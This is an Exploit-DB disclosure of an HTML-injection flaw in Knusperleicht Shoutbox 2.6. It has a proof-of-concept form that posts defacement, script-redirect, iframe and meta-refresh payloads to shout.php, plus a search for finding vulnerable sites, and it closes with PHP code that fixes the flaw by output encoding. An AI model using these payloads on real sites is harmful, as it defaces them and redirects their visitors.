Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection

EDB-ID:

29294


Author:

IMHOT3B

Type:

webapps


Platform:

PHP

Date:

2006-12-18


source: https://www.securityfocus.com/bid/21637/info

Knusperleicht Shoutbox is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.

Version 2.6 is vulnerable; other versions may also be affected.

<html>
<head><title>Cyber-Sabotage.Org</title></head>
<body>
<p align="center"><b>IMHOT3B</b></p>
<p align="center"><b>Knusperleicht Shoutbox 2.6 Html Injection Bug</b></p>
<p align="center"><b><font size="4">Cyber-Sabotage.Org</font></b><br></p>
<p align="center">
<a href="http://www.google.com.tr/search?hl=tr&q=intitle:"Knusperleicht+Shoutbox+2.6"&meta=">For Searching Click Here Please</a><br>
</p>
<form name="form1" method="post" action="http://target/shout.php">
Nick Name | Takma Ad:<p>
<input type="text" name="sbNick" size="127" value="</table><h1><font color=#ff0000> Cyber-Sabotage.Org | CSDT ( Cyber Sabotage and Defacer ) TEAM </font></h1>" maxlength="900"><br>
<input type="hidden" name="AdminNick" value="si"><br>
Message | Mesaj:<br>
<input type="text" name="sbKommentar" size="127" value="</table><h1><font color=#ff0000> Cyber-Sabotage.Org | CSDT ( Cyber Sabotage and Defacer ) TEAM </font></h1>"><br>
<input type="submit" name="sbAbschicken" value="Send | Gonder" class="form"><br>
</p>
</form>
<p><b>Alternatif Html Kodlar.:</b></p>
<p><b><h1>Cyber-Sabotage.Org</h1></b></p>
<p><b><font color="#FFFFFF"><div style=left:0px;top:0px;width:1000px;height:8000px;background-color:#000000;position:absolute><h1>Hacked By IMHOT3B<br>Cyber-Sabotage.Org&lt;br></div></font></b></p>
<p><b><iframe src="http://www.cyber-sabotage.org" borders="0"></iframe></b></p>
<p><b><script>location.href="http://www.cyber-sabotage.org&quot;;</script></b></p>
<p><b><meta http-equiv="Refresh" content="0;url=http://www.cyber-sabotage.org"></b></p>
</body></html>
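The root cause above is that shout.php echoes sbNick and sbKommentar back into the page without output encoding. The handler below is an added example, not Knusperleicht Shoutbox's own code: it stores the raw values and applies HTML encoding at render time, so the `</table><h1>...` payload from the form is displayed as literal text instead of closing the table. The storage file, the length limit and all function names are assumptions.

```php
<?php
// Added example, not the Knusperleicht Shoutbox source: a minimal shout.php-style
// handler that output-encodes the two injected fields (sbNick, sbKommentar).
// Storage path, MAX_LEN and function names are hypothetical.
declare(strict_types=1);

const SHOUT_FILE = __DIR__ . '/shouts.json';   // assumed storage location
const MAX_LEN    = 900;                         // mirrors the form's maxlength

// Encode a value for an HTML text node or quoted attribute. ENT_QUOTES covers
// both quote styles; ENT_SUBSTITUTE keeps invalid UTF-8 from collapsing the
// whole string to "" (which would silently hide what was submitted).
function encode_for_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Read and trim a POST field. The form's maxlength is client-side only, so the
// limit is enforced again here (mb_strlen needs the mbstring extension).
function read_field(array $post, string $key): string
{
    $value = trim((string)($post[$key] ?? ''));
    if ($value === '' || mb_strlen($value, 'UTF-8') > MAX_LEN) {
        http_response_code(400);
        exit('invalid ' . $key);
    }
    return $value;
}

// Store the raw input. Encoding is deferred to render time so other consumers
// (an admin view, a feed) can encode for their own output context.
function store_shout(string $nick, string $message): void
{
    $raw    = file_exists(SHOUT_FILE) ? (string)file_get_contents(SHOUT_FILE) : '[]';
    $shouts = json_decode($raw, true) ?? [];
    $shouts[] = ['nick' => $nick, 'msg' => $message, 'ts' => time()];
    file_put_contents(SHOUT_FILE, json_encode($shouts), LOCK_EX);
}

// Render one entry as a table row. A stored nick of "</table><h1>x</h1>" comes
// out as "&lt;/table&gt;&lt;h1&gt;x&lt;/h1&gt;" and cannot alter the markup.
function render_shout(array $shout): string
{
    return '<tr><td>' . encode_for_html($shout['nick']) . '</td><td>'
         . encode_for_html($shout['msg']) . '</td></tr>';
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_POST['sbAbschicken'])) {
    store_shout(read_field($_POST, 'sbNick'), read_field($_POST, 'sbKommentar'));
}
```

Unknown extra fields such as the hidden AdminNick in the exploit form are simply never read, which is the behaviour you want from a handler that only accepts an explicit allowlist of parameters.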